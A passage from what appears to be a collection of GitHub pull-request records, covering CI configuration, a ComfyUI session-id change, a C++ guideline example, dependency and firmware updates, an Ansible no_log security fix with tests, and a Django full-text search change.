+ IMAGE_NAME: macOS-10.14
+ PYTHON_VERSION: 2.7
+ TOXENV: py27
+ macos-py38:
+ IMAGE_NAME: macOS-10.14
+ PYTHON_VERSION: 3.8
+ TOXENV: py38
+ windows-py35:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.5
TOXENV: py35
- py37-cover:
+ windows-py37-cover:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.7
TOXENV: py37-cover
- integration-certbot:
+ windows-integration-certbot:
+ IMAGE_NAME: vs2017-win2016
PYTHON_VERSION: 3.7
TOXENV: integration-certbot
PYTEST_ADDOPTS: --numprocesses 4
+ pool:
+ vmImage: $(IMAGE_NAME)
variables:
- group: certbot-common
steps:
+ - bash: brew install augeas
+ condition: startswith(variables['IMAGE_NAME'], 'macOS')
+ displayName: Install Augeas
- task: UsePythonVersion@0
inputs:
versionSpec: $(PYTHON_VERSION)
diff --git a/.travis.yml b/.travis.yml
index 1eae66333b3..e5354898d52 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -6,7 +6,6 @@ cache:
- $HOME/.cache/pip
before_script:
- - 'if [[ "$TRAVIS_OS_NAME" == "osx" ]]; then ulimit -n 1024 ; fi'
# On Travis, the fastest parallelization for integration tests has proved to be 4.
- 'if [[ "$TOXENV" == *"integration"* ]]; then export PYTEST_ADDOPTS="--numprocesses 4"; fi'
# Use Travis retry feature for farm tests since they are flaky
@@ -224,24 +223,6 @@ matrix:
packages: # don't install nginx and apache
- libaugeas0
<<: *extended-test-suite
- - language: generic
- env: TOXENV=py27
- os: osx
- addons:
- homebrew:
- packages:
- - augeas
- - python2
- <<: *extended-test-suite
- - language: generic
- env: TOXENV=py3
- os: osx
- addons:
- homebrew:
- packages:
- - augeas
- - python3
- <<: *extended-test-suite
# container-based infrastructure
sudo: false
| [Our macOS tests are failing](https://travis-ci.com/certbot/certbot/builds/149965318) again this time due to the problem described at https://travis-ci.community/t/macos-build-fails-because-of-homebrew-bundle-unknown-command/7296/14.
I tried adding `update: true` to the Homebrew config as described in that thread, but [it didn't work](https://travis-ci.com/certbot/certbot/builds/150070374). I also tried updating the macOS image we use which [didn't work](https://travis-ci.com/certbot/certbot/builds/150072389).
Since we continue to have problems with macOS on Travis, let try moving the tests to Azure Pipelines. | https://api.github.com/repos/certbot/certbot/pulls/7793 | 2020-02-21T18:42:52Z | 2020-02-21T19:18:54Z | 2020-02-21T19:18:54Z | 2020-02-21T19:20:47Z | 741 | certbot/certbot | 3,761 |
Use window.name instead of session storage | diff --git a/web/scripts/api.js b/web/scripts/api.js
index 2b90c2abc8..d29faa5bae 100644
--- a/web/scripts/api.js
+++ b/web/scripts/api.js
@@ -35,7 +35,7 @@ class ComfyApi extends EventTarget {
}
let opened = false;
- let existingSession = sessionStorage["Comfy.SessionId"] || "";
+ let existingSession = window.name;
if (existingSession) {
existingSession = "?clientId=" + existingSession;
}
@@ -75,7 +75,7 @@ class ComfyApi extends EventTarget {
case "status":
if (msg.data.sid) {
this.clientId = msg.data.sid;
- sessionStorage["Comfy.SessionId"] = this.clientId;
+ window.name = this.clientId;
}
this.dispatchEvent(new CustomEvent("status", { detail: msg.data.status }));
break;
| Prevents "Duplicate Tab" stealing session id, fixes #549
I've tested with Firefox, Chrome, Colab local tunnel | https://api.github.com/repos/comfyanonymous/ComfyUI/pulls/555 | 2023-04-23T09:37:39Z | 2023-04-23T17:02:22Z | 2023-04-23T17:02:21Z | 2023-04-28T07:28:37Z | 210 | comfyanonymous/ComfyUI | 17,832 |
R.5 (scoped objects): Do not warn on a const `unique_ptr<T[]>` | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index d9a7cf328..939e74c80 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -9550,6 +9550,28 @@ Instead, use a local variable:
* (Moderate) Warn if an object is allocated and then deallocated on all paths within a function. Suggest it should be a local `auto` stack object instead.
* (Simple) Warn if a local `Unique_pointer` or `Shared_pointer` is not moved, copied, reassigned or `reset` before its lifetime ends.
+Exception: Do not produce such a warning on a local `Unique_pointer` to an unbounded array. (See below.)
+
+##### Exception
+
+It is OK to create a local `const unique_ptr<T[]>` to a heap-allocated buffer, as this is a valid way to represent a scoped dynamic array.
+
+##### Example
+
+A valid use case for a local `const unique_ptr<T[]>` variable:
+
+ int get_median_value(const std::list<int>& integers)
+ {
+ const auto size = integers.size();
+
+ // OK: declaring a local unique_ptr<T[]>.
+ const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
+
+ std::copy_n(begin(integers), size, local_buffer.get());
+ std::nth_element(local_buffer.get(), local_buffer.get() + size/2, local_buffer.get() + size);
+
+ return local_buffer[size/2];
+ }
### <a name="Rr-global"></a>R.6: Avoid non-`const` global variables
| `unique_ptr<T[]>` is being used in practice to declare a local dynamically allocated buffer, for example:
const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
Especially when the `unique_ptr` is declared "const", a warning that it is not moved, copied, reassigned or `reset` does not appear suitable.
----
For the record, here is a complete code example, using such a local `Unique_pointer` ~~(not included with the proposed commit)~~:
```
int get_median_value(const std::list<int>& integers)
{
const auto size = integers.size();
const auto local_buffer = std::make_unique_for_overwrite<int[]>(size);
std::copy_n(begin(integers), size, local_buffer.get());
std::nth_element(local_buffer.get(), local_buffer.get() + size/2, local_buffer.get() + size);
return local_buffer[size/2];
}
```
----
Update: the code example above here is now part of the proposed text itself, as requested by Herb Sutter at https://github.com/isocpp/CppCoreGuidelines/pull/1969#issuecomment-1255555334 | https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1969 | 2022-08-31T12:45:53Z | 2022-10-13T21:08:53Z | 2022-10-13T21:08:53Z | 2022-10-13T21:08:53Z | 372 | isocpp/CppCoreGuidelines | 16,110 |
Bump ipython from 8.9.0 to 8.10.0 | diff --git a/requirements.txt b/requirements.txt
index 11ee47eb5f86f..fc1e2aeaf7c65 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -6,7 +6,7 @@ pytest-dotenv==0.5.2
# third-party (libraries)
rake_nltk==1.0.6
-ipython==8.9.0
+ipython==8.10.0
# linting stubs
types-requests==2.28.11.8
| Bumps [ipython](https://github.com/ipython/ipython) from 8.9.0 to 8.10.0.
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/ipython/ipython/commit/15ea1ed5a886d6c19c1cc4856f2cf04a2a547c57"><code>15ea1ed</code></a> release 8.10.0</li>
<li><a href="https://github.com/ipython/ipython/commit/560ad109197c0f8373865896af369bb3b36fd229"><code>560ad10</code></a> DOC: Update what's new for 8.10 (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13939">#13939</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/7557ade0ed927475d5ab5b573d0ea4febfb22683"><code>7557ade</code></a> DOC: Update what's new for 8.10</li>
<li><a href="https://github.com/ipython/ipython/commit/385d69325319a5972ee9b5983638e3617f21cb1f"><code>385d693</code></a> Merge pull request from GHSA-29gw-9793-fvw7</li>
<li><a href="https://github.com/ipython/ipython/commit/e548ee23ac460a99901f1cd43b94ae84a35ec393"><code>e548ee2</code></a> Swallow potential exceptions from showtraceback() (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13934">#13934</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/0694b08b436203817059ec7e7136cf8561a6f013"><code>0694b08</code></a> MAINT: mock slowest test. (<a href="https://github-redirect.dependabot.com/ipython/ipython/issues/13885">#13885</a>)</li>
<li><a href="https://github.com/ipython/ipython/commit/865591252a67c6907fe03228b4053305715286e6"><code>8655912</code></a> MAINT: mock slowest test.</li>
<li><a href="https://github.com/ipython/ipython/commit/a011765b44febfb11bae122d2ed7db763621ac8f"><code>a011765</code></a> Isolate the attack tests with setUp and tearDown methods</li>
<li><a href="https://github.com/ipython/ipython/commit/c7a9470e540392c575aac46c3ee5cf4fe5123eb1"><code>c7a9470</code></a> Add some regression tests for this change</li>
<li><a href="https://github.com/ipython/ipython/commit/fd34cf5f1f6e243243c738c6e0cf62eb682c4d68"><code>fd34cf5</code></a> Swallow potential exceptions from showtraceback()</li>
<li>Additional commits viewable in <a href="https://github.com/ipython/ipython/compare/8.9.0...8.10.0">compare view</a></li>
</ul>
</details>
<br />
[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=ipython&package-manager=pip&previous-version=8.9.0&new-version=8.10.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
- `@dependabot use these labels` will set the current labels as the default for future PRs for this repo and language
- `@dependabot use these reviewers` will set the current reviewers as the default for future PRs for this repo and language
- `@dependabot use these assignees` will set the current assignees as the default for future PRs for this repo and language
- `@dependabot use this milestone` will set the current milestone as the default for future PRs for this repo and language
You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/jerryjliu/gpt_index/network/alerts).
</details> | https://api.github.com/repos/run-llama/llama_index/pulls/444 | 2023-02-14T08:36:10Z | 2023-02-14T08:39:32Z | 2023-02-14T08:39:32Z | 2023-02-14T08:39:33Z | 123 | run-llama/llama_index | 6,470 |
Hyundai: Add FW Versions for Elantra 2023 | diff --git a/docs/CARS.md b/docs/CARS.md
index 0d4c53ac015e11..4a46360d4f861c 100644
--- a/docs/CARS.md
+++ b/docs/CARS.md
@@ -57,7 +57,7 @@ A supported vehicle is one that just works when you install a comma three. All s
|Honda|Pilot 2016-22|Honda Sensing|openpilot|25 mph|12 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Honda&model=Pilot 2016-22">Honda Nidec</a>||
|Honda|Ridgeline 2017-22|Honda Sensing|openpilot|25 mph|12 mph|[![star](assets/icon-star-empty.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Honda&model=Ridgeline 2017-22">Honda Nidec</a>||
|Hyundai|Elantra 2017-19|Smart Cruise Control (SCC)|Stock|19 mph|32 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2017-19">Hyundai B</a>||
-|Hyundai|Elantra 2021-22|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2021-22">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
+|Hyundai|Elantra 2021-23|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra 2021-23">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
|Hyundai|Elantra GT 2017-19|Smart Cruise Control (SCC)|Stock|0 mph|32 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra GT 2017-19">Hyundai E</a>||
|Hyundai|Elantra Hybrid 2021-23|Smart Cruise Control (SCC)|openpilot available[<sup>1</sup>](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Elantra Hybrid 2021-23">Hyundai K</a>|<a href="https://youtu.be/_EdYQtV52-c" target="_blank"><img height="18px" src="assets/icon-youtube.svg"></img></a>|
|Hyundai|Genesis 2015-16|Smart Cruise Control (SCC)|Stock|19 mph|37 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|<a href="https://comma.ai/shop/comma-three.html?make=Hyundai&model=Genesis 2015-16">Hyundai J</a>||
diff --git a/selfdrive/car/hyundai/values.py b/selfdrive/car/hyundai/values.py
index 31cbe68d1366a6..b3cb46699ad3ba 100644
--- a/selfdrive/car/hyundai/values.py
+++ b/selfdrive/car/hyundai/values.py
@@ -145,7 +145,7 @@ def init_make(self, CP: car.CarParams):
HyundaiCarInfo("Hyundai Elantra GT 2017-19", harness=Harness.hyundai_e),
HyundaiCarInfo("Hyundai i30 2017-19", harness=Harness.hyundai_e),
],
- CAR.ELANTRA_2021: HyundaiCarInfo("Hyundai Elantra 2021-22", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
+ CAR.ELANTRA_2021: HyundaiCarInfo("Hyundai Elantra 2021-23", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
CAR.ELANTRA_HEV_2021: HyundaiCarInfo("Hyundai Elantra Hybrid 2021-23", video_link="https://youtu.be/_EdYQtV52-c", harness=Harness.hyundai_k),
CAR.HYUNDAI_GENESIS: HyundaiCarInfo("Hyundai Genesis 2015-16", min_enable_speed=19 * CV.MPH_TO_MS, harness=Harness.hyundai_j), # TODO: check 2015 packages
CAR.IONIQ: HyundaiCarInfo("Hyundai Ioniq Hybrid 2017-19", harness=Harness.hyundai_c),
@@ -1322,25 +1322,26 @@ class Buttons:
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00CN7_ SCC F-CUP 1.00 1.01 99110-AA000 ',
b'\xf1\x00CN7_ SCC FHCUP 1.00 1.01 99110-AA000 ',
+ b'\xf1\x00CN7_ SCC FNCUP 1.00 1.01 99110-AA000 ',
b'\xf1\x8799110AA000\xf1\x00CN7_ SCC FHCUP 1.00 1.01 99110-AA000 ',
b'\xf1\x8799110AA000\xf1\x00CN7_ SCC F-CUP 1.00 1.01 99110-AA000 ',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x00CN7 MDPS C 1.00 1.06 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 4CNDC106',
b'\xf1\x8756310/AA070\xf1\x00CN7 MDPS C 1.00 1.06 56310/AA070 4CNDC106',
- b'\xf1\x8756310AA050\x00\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106',
b'\xf1\x8756310AA050\x00\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106\xf1\xa01.06',
+ b'\xf1\x00CN7 MDPS C 1.00 1.06 56310AA050\x00 4CNDC106',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.00 99210-AB000 200819',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.03 99210-AA000 200819',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.01 99210-AB000 210205',
b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.06 99210-AA000 220111',
+ b'\xf1\x00CN7 MFC AT USA LHD 1.00 1.03 99210-AB000 220426',
],
(Ecu.abs, 0x7d1, None): [
b'\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800',
b'\xf1\x8758910-AA800\xf1\x00CN ESC \t 104 \x08\x03 58910-AA800',
- b'\xf1\x8758910-AB800\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800',
b'\xf1\x8758910-AA800\xf1\x00CN ESC \t 105 \x10\x03 58910-AA800',
b'\xf1\x8758910-AB800\xf1\x00CN ESC \t 101 \x10\x03 58910-AB800\xf1\xa01.01',
],
@@ -1358,6 +1359,7 @@ class Buttons:
b'\xf1\x81HM6M2_0a0_FF0',
b'\xf1\x82CNCVD0AMFCXCSFFB',
b'\xf1\x870\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x81HM6M2_0a0_G80',
+ b'\xf1\x870\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x81HM6M2_0a0_HC0',
],
},
CAR.ELANTRA_HEV_2021: {
| Add firmware for the 2023 Hyundai Elantra. Expand supported model-year range up to 2023.
Route ID: `5bd4c9ea08bd24af|2022-12-22--23-42-20`
Thanks to community 2023 Hyundai Elantra owner `drewparks7#0148` (Discord). | https://api.github.com/repos/commaai/openpilot/pulls/27026 | 2023-01-21T03:23:54Z | 2023-01-25T00:11:13Z | 2023-01-25T00:11:13Z | 2023-04-25T22:04:48Z | 2,307 | commaai/openpilot | 8,908 |
DOC Update release checklist regarding SECURITY.md | diff --git a/doc/developers/maintainer.rst b/doc/developers/maintainer.rst
index 1b79fbd3c282c..54b75a96b6360 100644
--- a/doc/developers/maintainer.rst
+++ b/doc/developers/maintainer.rst
@@ -301,7 +301,6 @@ The following GitHub checklist might be helpful in a release PR::
* [ ] update news and what's new date in release branch
* [ ] update news and what's new date and sklearn dev0 version in main branch
- * [ ] update SECURITY.md in release and main branch
* [ ] check that the wheels for the release can be built successfully
* [ ] merge the PR with `[cd build]` commit message to upload wheels to the staging repo
* [ ] upload the wheels and source tarball to https://test.pypi.org
@@ -311,6 +310,7 @@ The following GitHub checklist might be helpful in a release PR::
* [ ] upload the wheels and source tarball to PyPI
* [ ] https://github.com/scikit-learn/scikit-learn/releases publish (except for RC)
* [ ] announce on mailing list and on Twitter, and LinkedIn
+ * [ ] update SECURITY.md in main branch (except for RC)
Merging Pull Requests
---------------------
| Follow-up of https://github.com/scikit-learn/scikit-learn/pull/25047
SECURITY.md is bound to the github repo. There's no need to update it in the release branch (it's not shipped in the wheels anyway). We only need to update it once the final release for a version (minor or major) is online. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/25122 | 2022-12-06T16:50:02Z | 2022-12-06T18:02:44Z | 2022-12-06T18:02:44Z | 2022-12-06T18:02:44Z | 298 | scikit-learn/scikit-learn | 46,877 |
[stable-2.7] Properly mask no_log values is sub parameters during failure (#63405) | diff --git a/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml b/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml
new file mode 100644
index 00000000000000..79019d64cfeed9
--- /dev/null
+++ b/changelogs/fragments/no-log-sub-options-invalid-parameter.yaml
@@ -0,0 +1,2 @@
+bugfixes:
+ - '**security issue** - properly hide parameters marked with ``no_log`` in suboptions when invalid parameters are passed to the module (CVE-2019-14858)'
diff --git a/lib/ansible/module_utils/basic.py b/lib/ansible/module_utils/basic.py
index 2b33aa3ee985f7..d2a43e7f87c844 100644
--- a/lib/ansible/module_utils/basic.py
+++ b/lib/ansible/module_utils/basic.py
@@ -1665,6 +1665,34 @@ def _handle_no_log_values(self, spec=None, param=None):
if no_log_object:
self.no_log_values.update(return_values(no_log_object))
+ # Get no_log values from suboptions
+ sub_argument_spec = arg_opts.get('options')
+ if sub_argument_spec is not None:
+ wanted_type = arg_opts.get('type')
+ sub_parameters = param.get(arg_name)
+
+ if sub_parameters is not None:
+ if wanted_type == 'dict' or (wanted_type == 'list' and arg_opts.get('elements', '') == 'dict'):
+ # Sub parameters can be a dict or list of dicts. Ensure parameters are always a list.
+ if not isinstance(sub_parameters, list):
+ sub_parameters = [sub_parameters]
+
+ for sub_param in sub_parameters:
+ # Validate dict fields in case they came in as strings
+
+ if isinstance(sub_param, string_types):
+ sub_param = self._check_type_dict(sub_param)
+
+ try:
+ if not isinstance(sub_param, Mapping):
+ raise TypeError("Value '{1}' in the sub parameter field '{0}' must by a {2}, "
+ "not '{1.__class__.__name__}'".format(arg_name, sub_param, wanted_type))
+ except TypeError as te:
+ self.fail_json(msg="Failure when processing no_log parameters. Module invocation will be hidden. "
+ "%s" % to_native(te), invocation={'module_args': 'HIDDEN DUE TO FAILURE'})
+
+ self._handle_no_log_values(sub_argument_spec, sub_param)
+
if arg_opts.get('removed_in_version') is not None and arg_name in param:
self._deprecations.append({
'msg': "Param '%s' is deprecated. See the module docs for more information" % arg_name,
@@ -2032,7 +2060,6 @@ def _handle_options(self, argument_spec=None, params=None):
self._set_fallbacks(spec, param)
options_aliases = self._handle_aliases(spec, param)
- self._handle_no_log_values(spec, param)
options_legal_inputs = list(spec.keys()) + list(options_aliases.keys())
self._check_arguments(self.check_invalid_arguments, spec, param, options_legal_inputs)
diff --git a/test/integration/targets/no_log/library/module.py b/test/integration/targets/no_log/library/module.py
new file mode 100644
index 00000000000000..d4f3c565cff9c0
--- /dev/null
+++ b/test/integration/targets/no_log/library/module.py
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# Copyright (c) 2019 Ansible Project
+# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
+
+from __future__ import absolute_import, division, print_function
+__metaclass__ = type
+
+from ansible.module_utils.basic import AnsibleModule
+
+
+def main():
+ module = AnsibleModule(
+ argument_spec={
+ 'state': {},
+ 'secret': {'no_log': True},
+ 'subopt_dict': {
+ 'type': 'dict',
+ 'options': {
+ 'str_sub_opt1': {'no_log': True},
+ 'str_sub_opt2': {},
+ 'nested_subopt': {
+ 'type': 'dict',
+ 'options': {
+ 'n_subopt1': {'no_log': True},
+ }
+ }
+ }
+ },
+ 'subopt_list': {
+ 'type': 'list',
+ 'elements': 'dict',
+ 'options': {
+ 'subopt1': {'no_log': True},
+ 'subopt2': {},
+ }
+ }
+
+ }
+ )
+ module.exit_json(msg='done')
+
+
+if __name__ == '__main__':
+ main()
diff --git a/test/integration/targets/no_log/no_log_local.yml b/test/integration/targets/no_log/no_log_local.yml
index aacf7de27699f2..41b1858e62b6c6 100644
--- a/test/integration/targets/no_log/no_log_local.yml
+++ b/test/integration/targets/no_log/no_log_local.yml
@@ -47,6 +47,7 @@
poll: 1
shell: echo "DO_NOT_LOG_ASYNC_TASK_SUCCEEDED"
no_log: true
+ ignore_errors: yes
- name: play-level no_log set
hosts: testhost
diff --git a/test/integration/targets/no_log/no_log_suboptions.yml b/test/integration/targets/no_log/no_log_suboptions.yml
new file mode 100644
index 00000000000000..e67ecfe21b5993
--- /dev/null
+++ b/test/integration/targets/no_log/no_log_suboptions.yml
@@ -0,0 +1,24 @@
+- name: test no log with suboptions
+ hosts: testhost
+ gather_facts: no
+
+ tasks:
+ - name: Task with suboptions
+ module:
+ secret: GLAMOROUS
+ subopt_dict:
+ str_sub_opt1: AFTERMATH
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: MANPOWER
+
+ subopt_list:
+ - subopt1: UNTAPPED
+ subopt2: thridstring
+
+ - subopt1: CONCERNED
+
+ - name: Task with suboptions as string
+ module:
+ secret: MARLIN
+ subopt_dict: str_sub_opt1=FLICK
diff --git a/test/integration/targets/no_log/no_log_suboptions_invalid.yml b/test/integration/targets/no_log/no_log_suboptions_invalid.yml
new file mode 100644
index 00000000000000..933a8a9bb2723d
--- /dev/null
+++ b/test/integration/targets/no_log/no_log_suboptions_invalid.yml
@@ -0,0 +1,45 @@
+- name: test no log with suboptions
+ hosts: testhost
+ gather_facts: no
+ ignore_errors: yes
+
+ tasks:
+ - name: Task with suboptions and invalid parameter
+ module:
+ secret: SUPREME
+ invalid: param
+ subopt_dict:
+ str_sub_opt1: IDIOM
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: MOCKUP
+
+ subopt_list:
+ - subopt1: EDUCATED
+ subopt2: thridstring
+ - subopt1: FOOTREST
+
+ - name: Task with suboptions as string with invalid parameter
+ module:
+ secret: FOOTREST
+ invalid: param
+ subopt_dict: str_sub_opt1=CRAFTY
+
+ - name: Task with suboptions with dict instead of list
+ module:
+ secret: FELINE
+ subopt_dict:
+ str_sub_opt1: CRYSTAL
+ str_sub_opt2: otherstring
+ nested_subopt:
+ n_subopt1: EXPECTANT
+ subopt_list:
+ foo: bar
+
+ - name: Task with suboptions with incorrect data type
+ module:
+ secret: AGROUND
+ subopt_dict: 9068.21361
+ subopt_list:
+ - subopt1: GOLIATH
+ - subopt1: FREEFALL
diff --git a/test/integration/targets/no_log/runme.sh b/test/integration/targets/no_log/runme.sh
index 474e755e13d472..bb5c048fc9ab3f 100755
--- a/test/integration/targets/no_log/runme.sh
+++ b/test/integration/targets/no_log/runme.sh
@@ -13,3 +13,9 @@ set -eux
# no log disabled, should produce 0 censored
[ "$(ansible-playbook dynamic.yml -i ../../inventory -vvvvv "$@" -e unsafe_show_logs=yes|grep -c 'output has been hidden')" = "0" ]
+
+# test no log for sub options
+[ "$(ansible-playbook no_log_suboptions.yml -i ../../inventory -vvvvv "$@" | grep -Ec '(MANPOWER|UNTAPPED|CONCERNED|MARLIN|FLICK)')" = "0" ]
+
+# test invalid data passed to a suboption
+[ "$(ansible-playbook no_log_suboptions_invalid.yml -i ../../inventory -vvvvv "$@" | grep -Ec '(SUPREME|IDIOM|MOCKUP|EDUCATED|FOOTREST|CRAFTY|FELINE|CRYSTAL|EXPECTANT|AGROUND|GOLIATH|FREEFALL)')" = "0" ]
| ##### SUMMARY
<!--- Describe the change below, including rationale and design decisions -->
Backport of #63405 for Ansible 2.7
(cherry picked from commit e9d29b1fe4)
This isn't a straight backport since the function for the original fix is in `basic.py` in this branch.
<!--- HINT: Include "Fixes #nnn" if you are fixing an existing issue -->
##### ISSUE TYPE
<!--- Pick one below and delete the rest -->
- Bugfix Pull Request
##### COMPONENT NAME
<!--- Write the short name of the module, plugin, task or feature below -->
`lib/ansible/module_utils/basic.py` | https://api.github.com/repos/ansible/ansible/pulls/63470 | 2019-10-14T16:49:21Z | 2019-10-14T22:31:16Z | 2019-10-14T22:31:16Z | 2019-11-13T20:01:31Z | 2,199 | ansible/ansible | 49,009 |
Fixed #31340 -- Allowed query expressions in SearchQuery.value and __search lookup. | diff --git a/django/contrib/postgres/search.py b/django/contrib/postgres/search.py
index 90b6823575423..2b2ae0c321b2d 100644
--- a/django/contrib/postgres/search.py
+++ b/django/contrib/postgres/search.py
@@ -11,7 +11,7 @@ class SearchVectorExact(Lookup):
lookup_name = 'exact'
def process_rhs(self, qn, connection):
- if not hasattr(self.rhs, 'resolve_expression'):
+ if not isinstance(self.rhs, (SearchQuery, CombinedSearchQuery)):
config = getattr(self.lhs, 'config', None)
self.rhs = SearchQuery(self.rhs, config=config)
rhs, rhs_params = super().process_rhs(qn, connection)
@@ -170,7 +170,8 @@ def __init__(self, value, output_field=None, *, config=None, invert=False, searc
self.function = self.SEARCH_TYPES.get(search_type)
if self.function is None:
raise ValueError("Unknown search_type argument '%s'." % search_type)
- value = Value(value)
+ if not hasattr(value, 'resolve_expression'):
+ value = Value(value)
expressions = (value,)
self.config = SearchConfig.from_parameter(config)
if self.config is not None:
diff --git a/docs/ref/contrib/postgres/search.txt b/docs/ref/contrib/postgres/search.txt
index 949d95929e558..65d54cfd8dd18 100644
--- a/docs/ref/contrib/postgres/search.txt
+++ b/docs/ref/contrib/postgres/search.txt
@@ -35,6 +35,10 @@ query and the vector.
To use the ``search`` lookup, ``'django.contrib.postgres'`` must be in your
:setting:`INSTALLED_APPS`.
+.. versionchanged:: 3.1
+
+ Support for query expressions was added.
+
``SearchVector``
================
@@ -108,7 +112,8 @@ See :ref:`postgresql-fts-search-configuration` for an explanation of the
.. versionchanged:: 3.1
- Support for ``'websearch'`` search type was added.
+ Support for ``'websearch'`` search type and query expressions in
+ ``SearchQuery.value`` were added.
``SearchRank``
==============
diff --git a/docs/releases/3.1.txt b/docs/releases/3.1.txt
index 278752db90c5f..de66d7805f72d 100644
--- a/docs/releases/3.1.txt
+++ b/docs/releases/3.1.txt
@@ -113,9 +113,14 @@ Minor features
* :class:`~django.contrib.postgres.search.SearchQuery` now supports
``'websearch'`` search type on PostgreSQL 11+.
+* :class:`SearchQuery.value <django.contrib.postgres.search.SearchQuery>` now
+ supports query expressions.
+
* The new :class:`~django.contrib.postgres.search.SearchHeadline` class allows
highlighting search results.
+* :lookup:`search` lookup now supports query expressions.
+
:mod:`django.contrib.redirects`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/tests/postgres_tests/migrations/0002_create_test_models.py b/tests/postgres_tests/migrations/0002_create_test_models.py
index 12d94e348a21d..ee1463e1eb7f4 100644
--- a/tests/postgres_tests/migrations/0002_create_test_models.py
+++ b/tests/postgres_tests/migrations/0002_create_test_models.py
@@ -185,6 +185,17 @@ class Migration(migrations.Migration):
},
bases=None,
),
+ migrations.CreateModel(
+ name='LineSavedSearch',
+ fields=[
+ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
+ ('line', models.ForeignKey('postgres_tests.Line', on_delete=models.CASCADE)),
+ ('query', models.CharField(max_length=100)),
+ ],
+ options={
+ 'required_db_vendor': 'postgresql',
+ },
+ ),
migrations.CreateModel(
